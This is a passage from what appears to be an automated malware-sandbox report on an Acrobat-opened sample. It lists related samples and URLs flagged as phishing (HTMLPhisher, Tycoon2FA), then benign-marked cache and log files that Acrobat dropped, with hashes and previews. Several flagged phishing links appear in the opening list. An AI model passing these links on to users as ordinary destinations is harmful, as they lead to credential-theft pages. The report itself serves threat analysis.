                                                      0064_QB_Payment_Statemnt87T.svgGet hashmaliciousHTMLPhisher, Invisible JS, Tycoon2FABrowse
                                                      • 23.216.132.28
                                                      Ipsen USA RFP.pdfGet hashmaliciousUnknownBrowse
                                                      • 23.216.136.238
                                                      https://8tf7eelab.cc.rs6.netGet hashmaliciousUnknownBrowse
                                                      • 23.216.132.75
                                                      702cb6e..emlGet hashmaliciousHTMLPhisherBrowse
                                                      • 23.216.132.28
                                                      YourToDo.svgGet hashmaliciousHTMLPhisherBrowse
                                                      • 23.216.132.21
                                                      https://urlzs.com/KxwhQDGet hashmaliciousHTMLPhisherBrowse
                                                      • 23.216.132.21
                                                      https://www.transfernow.net/en/bld?utm_source=20250321oYBy7zgbGet hashmaliciousHTMLPhisherBrowse
                                                      • 23.216.136.238
                                                      http://t.dripemail2.com/c/eyJhbGciOiJIUzI1NiJ9.eyJhdWQiOiJkZXRvdXIiLCJpc3MiOiJtb25vbGl0aCIsInN1YiI6ImRldG91cl9saW5rIiwiaWF0IjoxNzQyNDg1MjAxLCJuYmYiOjE3NDI0ODUyMDEsImFjY291bnRfaWQiOiI5MjExNzMxIiwiZGVsaXZlcnlfaWQiOiI2ZGY2cmIydXVwbjY4cnNhdWo0NCIsInRva2VuIjoiNmRmNnJiMnV1cG42OHJzYXVqNDQiLCJzZW5kX2F0IjoxNzQyNDgzOTQ4LCJlbWFpbF9pZCI6MTA1MDc4ODcsImVtYWlsYWJsZV90eXBlIjoiQnJvYWRjYXN0IiwiZW1haWxhYmxlX2lkIjo0MTkzMDc4LCJ1cmwiOiJodHRwOi8vZ2NyLnVwcGxleC5jby5rZT9fX3M9cWMwZ2JsdTk1emZnYmh3ZHp5OG4mdXRtX3NvdXJjZT1kcmlwJnV0bV9tZWRpdW09ZW1haWwmdXRtX2NhbXBhaWduPVdlK2dvdCthK21ha2VvdmVyLiJ9.nJ9tzd3-jhbWgSNwRLHamHKYwZXuNcZIG2E1QBFM5fgGet hashmaliciousHTMLPhisherBrowse
                                                      • 23.216.132.80

                                                      JA3 Fingerprints

                                                      No context

                                                      Dropped Files

                                                      No context

                                                      Created / dropped Files

                                                      C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG

                                                      Download File
                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                      File Type:ASCII text
                                                      Category:dropped
                                                      Size (bytes):298
                                                      Entropy (8bit):5.2151198917723285
                                                      Encrypted:false
                                                      SSDEEP:6:iOqIhf3Mq2PN72nKuAl9OmbnIFUtEIhfUliZmwmIhfUlOkwON72nKuAl9OmbjLJ:7qyMvVaHAahFUtEjE/mjk5OaHAaSJ
                                                      MD5:318E77AB10CE8B45DBB2F4CF8510D7F4
                                                      SHA1:4FEF19FF29DCCC8391E823F70C303993DF46BE32
                                                      SHA-256:E196370C6C97122EE384AF5F105E107740C80473D3767746FA8404BCED5432A7
                                                      SHA-512:5772847BE33FB18C9F8FE3179222E60D9C3C83E32DF18FDF3DB6A9CEFB2057B8FB312518C86EF44868ED83556D63EF59F61DFCD9BBE7F2F0E3BD8090794A5741
                                                      Malicious:false
                                                      Reputation:low
                                                      Preview:2025/03/25-06:53:46.776 1560 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2025/03/25-06:53:46.781 1560 Recovering log #3.2025/03/25-06:53:46.781 1560 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .

                                                      C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG.old (copy)

                                                      Download File
                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                      File Type:ASCII text
                                                      Category:dropped
                                                      Size (bytes):298
                                                      Entropy (8bit):5.2151198917723285
                                                      Encrypted:false
                                                      SSDEEP:6:iOqIhf3Mq2PN72nKuAl9OmbnIFUtEIhfUliZmwmIhfUlOkwON72nKuAl9OmbjLJ:7qyMvVaHAahFUtEjE/mjk5OaHAaSJ
                                                      MD5:318E77AB10CE8B45DBB2F4CF8510D7F4
                                                      SHA1:4FEF19FF29DCCC8391E823F70C303993DF46BE32
                                                      SHA-256:E196370C6C97122EE384AF5F105E107740C80473D3767746FA8404BCED5432A7
                                                      SHA-512:5772847BE33FB18C9F8FE3179222E60D9C3C83E32DF18FDF3DB6A9CEFB2057B8FB312518C86EF44868ED83556D63EF59F61DFCD9BBE7F2F0E3BD8090794A5741
                                                      Malicious:false
                                                      Reputation:low
                                                      Preview:2025/03/25-06:53:46.776 1560 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2025/03/25-06:53:46.781 1560 Recovering log #3.2025/03/25-06:53:46.781 1560 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .

                                                      C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG

                                                      Download File
                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                      File Type:ASCII text
                                                      Category:dropped
                                                      Size (bytes):342
                                                      Entropy (8bit):5.159523183518762
                                                      Encrypted:false
                                                      SSDEEP:6:iOqIhfDocM+q2PN72nKuAl9Ombzo2jMGIFUtEIhflNvNJZmwmIhflNvNcMVkwONx:7qYM+vVaHAa8uFUtEY5/mYsMV5OaHAaU
                                                      MD5:F1ACF909607F1C03277537BAC8D64B72
                                                      SHA1:FDEC04A63D3B5CB6B2F0CAB9BCE1ACA19289E5C0
                                                      SHA-256:57E459E9F7BDF23A4DE699835371A7652824355D67D69C27BBE400B28AD254F3
                                                      SHA-512:BDA2C5E56B8D877B18DBA3BAAFEF418222DC0893FED4EF8E2F15AE47D9EF179AA83E49EE7404F452DEF66537CB71B91DDA84383525D633A4BEA826DAB1195350
                                                      Malicious:false
                                                      Reputation:low
                                                      Preview:2025/03/25-06:53:46.598 1c6c Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/MANIFEST-000001.2025/03/25-06:53:46.603 1c6c Recovering log #3.2025/03/25-06:53:46.603 1c6c Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/000003.log .

                                                      C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG.old (copy)

                                                      Download File
                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                      File Type:ASCII text
                                                      Category:dropped
                                                      Size (bytes):342
                                                      Entropy (8bit):5.159523183518762
                                                      Encrypted:false
                                                      SSDEEP:6:iOqIhfDocM+q2PN72nKuAl9Ombzo2jMGIFUtEIhflNvNJZmwmIhflNvNcMVkwONx:7qYM+vVaHAa8uFUtEY5/mYsMV5OaHAaU
                                                      MD5:F1ACF909607F1C03277537BAC8D64B72
                                                      SHA1:FDEC04A63D3B5CB6B2F0CAB9BCE1ACA19289E5C0
                                                      SHA-256:57E459E9F7BDF23A4DE699835371A7652824355D67D69C27BBE400B28AD254F3
                                                      SHA-512:BDA2C5E56B8D877B18DBA3BAAFEF418222DC0893FED4EF8E2F15AE47D9EF179AA83E49EE7404F452DEF66537CB71B91DDA84383525D633A4BEA826DAB1195350
                                                      Malicious:false
                                                      Reputation:low
                                                      Preview:2025/03/25-06:53:46.598 1c6c Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/MANIFEST-000001.2025/03/25-06:53:46.603 1c6c Recovering log #3.2025/03/25-06:53:46.603 1c6c Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/000003.log .

                                                      C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\Network Persistent State (copy)

                                                      Download File
                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                      File Type:JSON data
                                                      Category:dropped
                                                      Size (bytes):475
                                                      Entropy (8bit):4.972572891763652
                                                      Encrypted:false
                                                      SSDEEP:12:YH/um3RA8sqJusBdOg2HX5caq3QYiubcP7E4T3y:Y2sRdsUdMHw3QYhbA7nby
                                                      MD5:405D8F87EB01D00569A102FDA4D02ED3
                                                      SHA1:959617CA642DB8D089254FB95B03480D9EA4BE08
                                                      SHA-256:B5285A3961ECBC0878997E6EBCCABB75AB31BB8DC55D97CD1098B396990144F8
                                                      SHA-512:31A548EBDE4234596E3AD31A56C596AD0B2B4CAD537D85BDC9FD1C5E8DFB43FADD93B6A18BBAE131B0516DFCEEE55066BAC44A3B9FA9B4F778BE30A9FA2E85F6
                                                      Malicious:false
                                                      Reputation:low
                                                      Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13387460038400562","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":102255},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.6","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"4G"}}}

                                                      C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\f75acf78-e5cc-4ca0-b77a-ab5eb201b627.tmp

                                                      Download File
                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                      File Type:JSON data
                                                      Category:modified
                                                      Size (bytes):475
                                                      Entropy (8bit):4.972572891763652
                                                      Encrypted:false
                                                      SSDEEP:12:YH/um3RA8sqJusBdOg2HX5caq3QYiubcP7E4T3y:Y2sRdsUdMHw3QYhbA7nby
                                                      MD5:405D8F87EB01D00569A102FDA4D02ED3
                                                      SHA1:959617CA642DB8D089254FB95B03480D9EA4BE08
                                                      SHA-256:B5285A3961ECBC0878997E6EBCCABB75AB31BB8DC55D97CD1098B396990144F8
                                                      SHA-512:31A548EBDE4234596E3AD31A56C596AD0B2B4CAD537D85BDC9FD1C5E8DFB43FADD93B6A18BBAE131B0516DFCEEE55066BAC44A3B9FA9B4F778BE30A9FA2E85F6
                                                      Malicious:false
                                                      Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13387460038400562","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":102255},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.6","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"4G"}}}

                                                      C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\000003.log

                                                      Download File
                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):5859
                                                      Entropy (8bit):5.255153155288631
                                                      Encrypted:false
                                                      SSDEEP:96:av+Nkkl+2GAouz3z3xfNLUS3vHp5OuDzUrMzh28qXAXFP74LRXOtW7ANwE7dvMDV:av+Nkkl+2G1uz3zhfZUyPp5OuDzUwzho
                                                      MD5:EEFD46D42E80A1AFE457B2CF68955BCA
                                                      SHA1:C1118E6CA4AE2B7B6485E870E235381AEB2D8795
                                                      SHA-256:B4666BABE2A157DC79AA38A2143E48D4A4555B94089160E3608495B39EAD3DED
                                                      SHA-512:1229CD5D8AA9E25DA5DAA8CD085252B02276779CF73EE4F1F58EF31ED5BF973075E150824BAC03B9A4A2F4D199E60E95A0619B5A6F49320B301FFAD126313B86
                                                      Malicious:false
                                                      Preview:*...#................version.1..namespace-.X.Bo................next-map-id.1.Pnamespace-c291b69d_46f8_4b09_b54e_d05df8a1271d-https://rna-resource.acrobat.com/.0.>j.r................next-map-id.2.Snamespace-63b958a8_6f71_4fde_913c_6518794b9fd1-https://rna-v2-resource.acrobat.com/.1.J.4r................next-map-id.3.Snamespace-37e4c694_2a8d_4b31_9eb8_e65c5f9e16d5-https://rna-v2-resource.acrobat.com/.2..J.o................next-map-id.4.Pnamespace-d7426d52_3038_4cd9_b9cc_897232425509-https://rna-resource.acrobat.com/.3..M.^...............Pnamespace-c291b69d_46f8_4b09_b54e_d05df8a1271d-https://rna-resource.acrobat.com/..d.^...............Pnamespace-d7426d52_3038_4cd9_b9cc_897232425509-https://rna-resource.acrobat.com/.u..a...............Snamespace-63b958a8_6f71_4fde_913c_6518794b9fd1-https://rna-v2-resource.acrobat.com/..`aa...............Snamespace-37e4c694_2a8d_4b31_9eb8_e65c5f9e16d5-https://rna-v2-resource.acrobat.com/`v.Yo................next-map-id.5.Pnamespace-30587558_ed88_4bd8_adc0_

                                                      C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG

                                                      Download File
                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                      File Type:ASCII text
                                                      Category:dropped
                                                      Size (bytes):330
                                                      Entropy (8bit):5.168593919165984
                                                      Encrypted:false
                                                      SSDEEP:6:iOqIhfsUWcM+q2PN72nKuAl9OmbzNMxIFUtEIhfsVgJZmwmIhfsQdEcMVkwON72v:7qHUjM+vVaHAa8jFUtEHw/mHQjMV5Oav
                                                      MD5:BB22B396DF7D264BBEEA0FB98F58F141
                                                      SHA1:30007E79FE091AE28F97A3EAA15CE70DE6211E14
                                                      SHA-256:37665F3AE27B89EB0AE76BE577C9DC0418DE596EE166E96BB961389DC76504E4
                                                      SHA-512:A872C3EA66FC36A950C44F6BD33D218D95FA448B7DC5637A8FD7A7A87C54FDFF99D2FA891B9617BC155903274D8846B0AB4BECDCA3281D867FD09C6997CC04FF
                                                      Malicious:false
                                                      Preview:2025/03/25-06:53:46.921 1c6c Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/MANIFEST-000001.2025/03/25-06:53:46.922 1c6c Recovering log #3.2025/03/25-06:53:46.925 1c6c Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/000003.log .

                                                      C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG.old (copy)

                                                      Download File
                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                      File Type:ASCII text
                                                      Category:dropped
                                                      Size (bytes):330
                                                      Entropy (8bit):5.168593919165984
                                                      Encrypted:false
                                                      SSDEEP:6:iOqIhfsUWcM+q2PN72nKuAl9OmbzNMxIFUtEIhfsVgJZmwmIhfsQdEcMVkwON72v:7qHUjM+vVaHAa8jFUtEHw/mHQjMV5Oav
                                                      MD5:BB22B396DF7D264BBEEA0FB98F58F141
                                                      SHA1:30007E79FE091AE28F97A3EAA15CE70DE6211E14
                                                      SHA-256:37665F3AE27B89EB0AE76BE577C9DC0418DE596EE166E96BB961389DC76504E4
                                                      SHA-512:A872C3EA66FC36A950C44F6BD33D218D95FA448B7DC5637A8FD7A7A87C54FDFF99D2FA891B9617BC155903274D8846B0AB4BECDCA3281D867FD09C6997CC04FF
                                                      Malicious:false
                                                      Preview:2025/03/25-06:53:46.921 1c6c Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/MANIFEST-000001.2025/03/25-06:53:46.922 1c6c Recovering log #3.2025/03/25-06:53:46.925 1c6c Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/000003.log .

                                                      C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ConnectorIcons\icon-250325105350Z-168.bmp

                                                      Download File
                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                      File Type:PC bitmap, Windows 3.x format, 107 x -152 x 32, cbSize 65110, bits offset 54
                                                      Category:dropped
                                                      Size (bytes):65110
                                                      Entropy (8bit):2.08316854565355
                                                      Encrypted:false
                                                      SSDEEP:96:75Hzb85L5Mno+KMNv13uTfbcQWZwaFeS6PYuSs+cxV4k7af6rS0W6OdOAOh5Op8b:7d85LQfjxwzEuSOLW6OdO7HOKTL
                                                      MD5:2943BA433BE964EF58541E51620CCD20
                                                      SHA1:8B92570BF9039C46F9150B1F3A0972A67E3B5CD0
                                                      SHA-256:7ED04FC79A7B72F7426FFFDC1FF18728051B23B2F6D7B8EE6A074EACEEA45C83
                                                      SHA-512:D73D49BA0900DEC9E754AF2A724DDCE91DA467179219330FBA2F472FC56B6347FBAA7970414EF7E9F8DE5D07F8676BC54875D9C1AD7190983E7389235A3ABED6
                                                      Malicious:false
                                                      Preview:BMV.......6...(...k...h..... ...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                      C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages

                                                      Download File
                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                      File Type:SQLite 3.x database, last written using SQLite version 3040000, file counter 11, database pages 21, cookie 0x5, schema 4, UTF-8, version-valid-for 11
                                                      Category:dropped
                                                      Size (bytes):86016
                                                      Entropy (8bit):4.445067033369245
                                                      Encrypted:false
                                                      SSDEEP:384:ye6ci5tRiBA7aDQPsknQ0UNCFOa14ocOUw6zyFzqFkdZ+EUTTcdUZ5yDQhJL:mis3OazzU89UTTgUL
                                                      MD5:D2889CD52AE5EACCC3BD1C42A89628F1
                                                      SHA1:8993E9D8FB93DA62E84BBAEE0FA3482D37F5ECD1
                                                      SHA-256:07BC9667B791A6A4F1BFA2C9F977DE29897919CE5EF4D4506FFCEC2F0F0CFC63
                                                      SHA-512:31EFE282A194255599DAEF5FC66B32B039EF8F538ECCFA46FE0F9FC1457A160C650F90D75E06BE0080071A3B1D04F84D3F60598BABD069E1DC2BF2DFC5DF5197
                                                      Malicious:false
                                                      Preview:SQLite format 3......@ ..........................................................................c.......1........T...U.1.D............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                      C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages-journal

                                                      Download File
                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                      File Type:SQLite Rollback Journal
                                                      Category:dropped
                                                      Size (bytes):8720
                                                      Entropy (8bit):3.7691202484960957
                                                      Encrypted:false
                                                      SSDEEP:48:7McAeJioyVxioyNoy1C7oy16oy1TKOioy1noy1AYoy1Wioy1oioykioyBoy1noyp:7LTJuxveXjBinb9IVXEBodRBkn
                                                      MD5:BE13123B272470AC16E051C61DD830BB
                                                      SHA1:834AFD2E0771A3D09E944807F0DABE0962BBC5FB
                                                      SHA-256:BE9934E171AD6DC16A011486F72FB22D88AEFAD6034B08FBF415B8ED54E2B901
                                                      SHA-512:F3B834010B81BA3DCDEEDA9F598803D9BB12B2FD31BF6FA041DB0AFD66C0B815AEC7523396ED96D144D717EDA9C32F3E7E1E39A81C08D6D130A2756BB5AB95F3
                                                      Malicious:false
                                                      Preview:.... .c......\{...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................T...[...b.r.l...t...}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                      C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\2D85F72862B55C4EADD9E66E06947F3D

                                                      Download File
                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                      File Type:Certificate, Version=3
                                                      Category:dropped
                                                      Size (bytes):1391
                                                      Entropy (8bit):7.705940075877404
                                                      Encrypted:false
                                                      SSDEEP:24:ooVdTH2NMU+I3E0Ulcrgdaf3sWrATrnkC4EmCUkmGMkfQo1fSZotWzD1:ooVguI3Kcx8WIzNeCUkJMmSuMX1
                                                      MD5:0CD2F9E0DA1773E9ED864DA5E370E74E
                                                      SHA1:CABD2A79A1076A31F21D253635CB039D4329A5E8
                                                      SHA-256:96BCEC06264976F37460779ACF28C5A7CFE8A3C0AAE11A8FFCEE05C0BDDF08C6
                                                      SHA-512:3B40F27E828323F5B91F8909883A78A21C86551761F27B38029FAAEC14AF5B7AA96FB9F9CC93EE201B5EB1D0FEF17B290747E8B839D2E49A8F36C5EBF3C7C910
                                                      Malicious:false
                                                      Preview:0..k0..S............@.YDc.c...0...*.H........0O1.0...U....US1)0'..U... Internet Security Research Group1.0...U....ISRG Root X10...150604110438Z..350604110438Z0O1.0...U....US1)0'..U... Internet Security Research Group1.0...U....ISRG Root X10.."0...*.H.............0..........$s..7.+W(.....8..n<.W.x.u...jn..O(..h.lD...c...k....1.!~.3<.H..y.....!.K...qiJffl.~<p..)"......K...~....G.|.H#S.8.O.o...IW..t../.8.{.p!.u.0<.....c...O..K~.....w...{J.L.%.p..)..S$........J.?..aQ.....cq...o[...\4ylv.;.by.../&.....................6....7..6u...r......I.....*.A..v........5/(.l....dwnG7..Y^h..r...A)>Y>.&.$...Z.L@.F....:Qn.;.}r...xY.>Qx....../..>{J.Ks......P.|C.t..t.....0.[q6....00\H..;..}`...).........A.......|.;F.H*..v.v..j.=...8.d..+..(.....B.".'].y...p..N..:..'Qn..d.3CO......B0@0...U...........0...U.......0....0...U......y.Y.{....s.....X..n0...*.H.............U.X....P.....i ')..au\.n...i/..VK..s.Y.!.~.Lq...`.9....!V..P.Y...Y.............b.E.f..|o..;.....'...}~.."......

                                                      C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506

                                                      Download File
                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                      File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 73305 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
                                                      Category:dropped
                                                      Size (bytes):73305
                                                      Entropy (8bit):7.996028107841645
                                                      Encrypted:true
                                                      SSDEEP:1536:krha8mqJ7v3CeFMz/akys7nSTK7QMuK+C/Oh5:kAOFq+Mba9Ok7C/O/
                                                      MD5:83142242E97B8953C386F988AA694E4A
                                                      SHA1:833ED12FC15B356136DCDD27C61A50F59C5C7D50
                                                      SHA-256:D72761E1A334A754CE8250E3AF7EA4BF25301040929FD88CF9E50B4A9197D755
                                                      SHA-512:BB6DA177BD16D163F377D9B4C63F6D535804137887684C113CC2F643CEAB4F34338C06B5A29213C23D375E95D22EF417EAC928822DFB3688CE9E2DE9D5242D10
                                                      Malicious:false
                                                      Preview:MSCF....Y.......,...................I.................;Za. .authroot.stl.98.?.6..CK..<Tk......4..c... .Ec...U.d.d.E&I.DH*..M.KB."..rK.RQ*..}f..f...}..1....9...........$.8q..fa...7.o.1.0...bfsM4.........u..l..0..4.a.t....0.....6#....n. :... ....%.,CQ5uU..(.3.<7#.0..JN.$...=j|w..*.#.oU..Eq[..P..^..~.V...;..m...I|...l..@-W..=.QQ.._./.M.nZ..(.........`.$Z.9wW:W.]..8*E.......I.D{..n...K:.m..^.(.S.......c..s.y..<...2.%o.o.....H.B.R.....11.|!.(...........h.SZ........<...^....Z>.Pp?... .pT@p.#.&..........#VEV=.....p........y..."T=l.n..egf.w..X.Y..-G...........KQ.]...pM..[m..-6.wd:........T...:.P5Zs....c.oT`..F1#......EuD.......7....V ..-....!.N..%S...k...S. ...@.J..../..b!B.(=\../.l......`.\...q9..>4!b..8EH.....zdy.....#...X>%0w...i.,>c.z.g"p.S..2W.+mMs.....5Def.....#._D.4....>}...i...\.&`D.......z;..ZY.3.+t.`....z_.q'w.z.)..j3.+.co.s..:.........qK...{...E....uPO...#vs.XxH.B!..(t. 8k+.....G\..?..GF8....'..w.>.ms..\ve.nFN..W)....xi..u..5.f.l....

                                                      C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\2D85F72862B55C4EADD9E66E06947F3D

                                                      Download File
                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):192
                                                      Entropy (8bit):2.7386214950254377
                                                      Encrypted:false
                                                      SSDEEP:3:kkFklqQQhMlXfllXlE/HT8kO/tNNX8RolJuRdxLlGB9lQRYwpDdt:kKzQ52T8p7NMa8RdWBwRd
                                                      MD5:91974217E48002D475AE4D96FBB42511
                                                      SHA1:C97B8C13A7EB046A189C4D9CC8D99147077D4678
                                                      SHA-256:F3B4A4CCA9CEC5C23087BAE8DAE2CA1176DB85A9107F83F51749C7AA590B0C07
                                                      SHA-512:0FA41DF1BEA8D2E4FCEEE2A3B9562ED0AC6D940390ADD3795B8FC4F72A2309EC0E1C75F9D326B5A6DD3D03980CCB428F6CBA0AACD9D3BE88DC36ED47D3626B02
                                                      Malicious:false
                                                      Preview:p...... ........Y..5t...(....................................................... ..........W....................o...h.t.t.p.:././.x.1...i...l.e.n.c.r...o.r.g./...".6.4.c.d.6.6.5.4.-.5.6.f."...

                                                      C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506

                                                      Download File
                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):330
                                                      Entropy (8bit):3.271723667521534
                                                      Encrypted:false
                                                      SSDEEP:6:kKOGmcQRnSN+SkQlPlEGYRMY9z+4KlDA3RUeqpGVuys1:BmfZkPlE99SNxAhUeq8S
                                                      MD5:568F726ED1B95AD0A8E9C26EFBA6C58E
                                                      SHA1:1B25C47B0621ED3455181B63064B09D4BFA6EB6B
                                                      SHA-256:867C48BE90310DF904E8C8D913EF34218A4EEDA7CD0311A98246C4589D245C2B
                                                      SHA-512:6141CB3A7445B7D317670FB0780A2C9204E941FD69CD04E660A93706EF3CC3C70F0250DBF8EF945E1918C1989D9B8D439E8AD48EF8AFE8F0E57EC394ED94B565
                                                      Malicious:false
                                                      Preview:p...... ...........Gt...(....................................................... ..................(....c*.....Y...h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".6.4.2.7.f.6.c.2.b.7.8.7.d.b.1.:.0."...

                                                      C:\Users\user\AppData\Local\Adobe\Acrobat\DC\IconCacheAcro65536.dat

                                                      Download File
                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):227002
                                                      Entropy (8bit):3.392780893644728
                                                      Encrypted:false
                                                      SSDEEP:1536:qKPC4iyzDtrh1cK3XEivK7VK/3AYvYwgF/rRoL+sn:XPCaJ/3AYvYwglFoL+sn
                                                      MD5:265E3E1166312A864FB63291EA661C6A
                                                      SHA1:80DFF3187FF929596EB22E1DB9021BAD6F97178C
                                                      SHA-256:C13E08B1887A4E44DC39609D7234E8D732A6BC11313B55D6F4ECFB060CD87728
                                                      SHA-512:48776A2BFE8F25E5601DCC0137F7AB103D5684517334B806E3ACF61683DD9B283828475FC85CE0CBE4E8AF88E6F8B25EED0A77640E2CFFF2CC73708726519AFA
                                                      Malicious:false
                                                      Preview:Adobe Acrobat Reader (64-bit) 23.6.20320....?A12_AV2_Search_18px.............................................................................................................KKK KKK.KKK.KKK.KKK.KKK.KKK@........................................KKK`KKK.KKK.KKK.KKK.KKK.KKK.KKK.KKK.KKK.............................KKKPKKK.KKK.KKK.KKK.........KKKPKKK.KKK.KKK.........................KKK.KKK.KKK.KKK0....................KKK.KKK.KKK.KKK`....................KKK`KKK.KKK.............................KKK@KKK.KKK.....................KKK.KKK.KKK0................................KKK.KKK.....................KKK.KKK.....................................KKK.KKK.....................KKK.KKK.KKK0................................KKK.KKK.....................KKK`KKK.KKK.............................KKK@KKK.KKK.....................KKK.KKK.KKK.KKK@....................KKK.KKK.KKK.KKK`........................KKKPKKK.KKK.KKK.KKK.........KKKPKKK.KKK.KKK.KKK.............................KKK`KKK.KKK.KKK.KKK.KKK.KKK.KKK.KKK.KKK

                                                      C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\ACROBAT_READER_MASTER_SURFACEID

                                                      Download File
                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                      File Type:JSON data
                                                      Category:dropped
                                                      Size (bytes):295
                                                      Entropy (8bit):5.345880737974702
                                                      Encrypted:false
                                                      SSDEEP:6:YEQXJ2HXJZRySRp0nZiQ0YnThoAvJM3g98kUwPeUkwRe9:YvXKXMSf0cMqGMbLUkee9
                                                      MD5:7BAB135B9022B48F12B118FE974E3275
                                                      SHA1:C77E0CD045E9DF032E41F98A269E24BEA8692554
                                                      SHA-256:BA9E9F549BC4010688A89BCA1D411E502D03EF574FE85C8710278016583F031A
                                                      SHA-512:517955983365083DFCE6F139DCACEA0E5197CBB61653246E2602F4DD7239632A588DA023780FA292E48B6C7045CBADC0F24480A3125DD46644E3687921E50788
                                                      Malicious:false
